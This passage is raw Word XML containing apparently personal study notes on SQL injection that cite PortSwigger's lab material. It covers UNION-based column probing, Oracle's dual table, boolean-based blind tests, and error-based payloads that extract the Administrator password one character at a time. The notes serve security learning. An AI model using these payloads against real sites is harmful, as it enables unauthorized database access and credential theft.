          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`' UNION SELECT 'a',NULL,NULL,NULL--` and shift the datatype one by one like `' UNION SELECT NULL,'a',NULL,NULL--`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">oracle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we could concatenate the columns `' UNION SELECT username || '~' || password FROM users--`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In SELECT statements, within the ORDER BY clause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For oracle the select NULL does not work unless from is not specified so use dual table </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a built-in table on Oracle called dual</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="5c5c5b"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="150" w:before="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ab/>
        <w:t xml:space="preserve">`SELECT NULL,NULL from dual`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="150" w:before="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ab/>
        <w:t xml:space="preserve">check if `‘||</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;subquery&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">||’` is present or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="150" w:before="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ab/>
        <w:tab/>
        <w:t xml:space="preserve">: `select ‘’ `works for all database (mysql, postgress, microsoft)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">: `select ‘’ from dual works` in oracle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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36">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ykd0lpj78zzp" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind and conditional injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.tlmdlnsc2ljb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">conditional injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">differences in the resulting application responses.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking blind injection if response has some changes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xyz' AND '1'='1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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3F">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for differences in the application's responses.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">`' AND (select SUBSTR(password,21,1) from users limit 1)='§a§`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">`xyz' AND 'b'='a`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">`xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">`xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) &gt; 'm') THEN 1/0 ELSE 'a' END FROM Users)='a`</w:t>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:b w:val="0"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portswigger.net/web-security/sql-injection/blind#exploiting-blind-sql-injection-by-triggering-conditional-errors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:after="150" w:before="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5">
      <w:pPr>
        <w:spacing w:after="150" w:before="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spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">`CAST((SELECT example_column FROM example_table) AS int)`</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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49">
      <w:pPr>
        <w:spacing w:after="150" w:before="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spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="bookmark=id.30j0zll" w:id="3"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="280" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
